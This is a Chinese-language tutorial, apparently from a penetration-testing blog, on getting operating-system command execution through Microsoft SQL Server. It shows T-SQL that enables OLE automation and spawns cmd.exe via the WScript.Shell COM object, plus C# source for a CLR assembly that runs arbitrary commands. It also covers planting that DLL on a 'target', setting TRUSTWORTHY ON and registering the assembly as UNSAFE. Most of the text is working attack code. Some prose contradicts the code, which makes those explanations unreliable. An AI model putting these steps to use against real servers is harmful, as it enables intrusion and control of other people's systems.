利用COM執行指令
(需要開啟Ole Automation Procedures元件)declare @luan <span>int</span>,@exec <span>int</span>,@text <span>int</span>,@str varchar(<span>8000 </span>);<br><span>exec</span> sp_oacreate <span>'{72C24DD5-D70A-438B-8A42-98424B88AFB8}'</span>,@luan output;<br><span>exec</span> sp_oamethod @luan,<span>'exec'</span> ,@exec output,<span>'C:\\Windows\\System32\\cmd.exe /c whoami'</span>;<br><span>exec</span> sp_oamethod @exec, <span>'StdOut'< /span>, @text out;<br><span>exec</span> sp_oamethod @text, <span>'readall'</span>, @str out;<br><span>select</span> @str;<br>
沒有開啟Ole Automation Procedures,可以用下面的指令開啟
<span>sp_configure</span> <span>'show advanced options'</span>, <span>1</span>;<br><span>GO< /span><br>RECONFIGURE;<br><span>GO</span><br>sp_configure <span>'Ole Automation Procedures'</span>, <span>1</span>;<br><span>GO</span><br>RECONFIGURE;<br><span>GO</span><br>
寫作語言:C#
Vs建立類別庫
<span>using</span> System;<br><span>using</span> System.Collections.Generic;<br><span>using</span> System.Linq;<br><span>using</span> System.Text;<br><span>using</span> System;<br><span>using</span> System.Threading.Tasks;< br><br><span>namespace</span> <span>shellexec</span><br>{<br> <span>public</span> <span>class</span> <span>exec</span><br> {<br> <span><span>public</span> <span>static</span> <span>string</span> <span>cmd</span> (<span><span>string</span> command</span>)<br> </span>{<br> System.Diagnostics.Process pro = <span>new</span> System.Diagnostics.Process();<br> pro.StartInfo.FileName = <span>"cmd.exe"</span>;<br> pro.StartInfo.UseShellExecute = <span>false</span>;<br > pro.StartInfo.RedirectStandardError = <span>true</span>; <span>//標準錯誤</span><br> pro.StartInfo.RedirectStandardInput = <span>true</span>; <span>//標準輸入</span><br> pro.StartInfo.RedirectStandardOutput = <span>true</span>; <span>//標準輸出</span>< br> pro.StartInfo.CreateNoWindow = <span>true</span>; <span>//是否在新視窗開啟進程</span><br> pro.Start();<br> pro.StandardInput.WriteLine(command + <span>"&&exit"</span>); <span>//指令參數寫入</span><br> pro.StandardInput.AutoFlush = <span>true </span>; <span>//緩衝區自動刷新</span><br> <span>string</span> output = pro.StandardOutput.ReadToEnd(); <span>//讀取執行結果</span><br> pro.WaitForExit(); <span>//等待執行完成退出</span><br> pro.Close();<br> <span> return</span> output.ToString();<br> }<br> }<br>}<br><br>
產生dll後,可以用hex的方法寫到目標,或是shell上傳。然後開始建構
1.目標資料庫實例需要啟用clr整合
<span>exec</span> sp_configure <span>'clr enabled'</span>,1;--在SQL Server中啟用CLR<br>reconfigure;<br>go<br>
2.目標資料庫的可信任屬性需要設為false,可以使用以下語句啟用
<span>ALTER</span> <span >DATABASE</span> [<資料庫名稱>] <span>SET</span> TRUSTWORTHY <span>ON</span><br>
3.在資料庫中註冊DLL
<span>CREATE</span> <span>ASSEMBLY</span> MySqlCLR <span>FROM</span> <span>'<dll的路徑>'</span> //MySqlCLR為導入dll後的變數為導入dll後的變數為導入dll後的變數名稱<br>
4.建立函數
(根據對應函數的類型的參數建構對應的參數類型,然後RETURNS [nvarchar] (max)記得設定為傳回最大如果是回傳string類型的話),在直接這個dll的名稱在那個命名空間、類別、函數)
<span>CREATE</span> <span>FUNCTION</span> [dbo].[cmd2] <br>( <br> @cmd <span>AS</span> <span>NVARCHAR</span>(< span>max</span>)<br>) <br><span>RETURNS</span> [<span>nvarchar</span>] (<span>max</span>) <span>WITH</span> <span>EXECUTE</span> <span>AS</span> CALLER<br><span>AS</span> <br><span>EXTERNAL</span> <span> NAME</span> [MySqlCLR].[shellexec.exec].cmd //shellexec為命名空間,exec為類別名,cmd為函數名稱<br><span>GO</span><br>
5.組件的權限等級必須設為external access,否則在部署的時候會報錯
<span>ALTER</span> <span>ASSEMBLY</span> [MySqlCLR]<br><span>WITH</span> PERMISSION_SET = <span>UNSAFE</span><br>
6.呼叫預存程序和函數方法
select [<span>dbo</span>].[<span>cmd2</span>](<span>'whoami'</ span>)<br>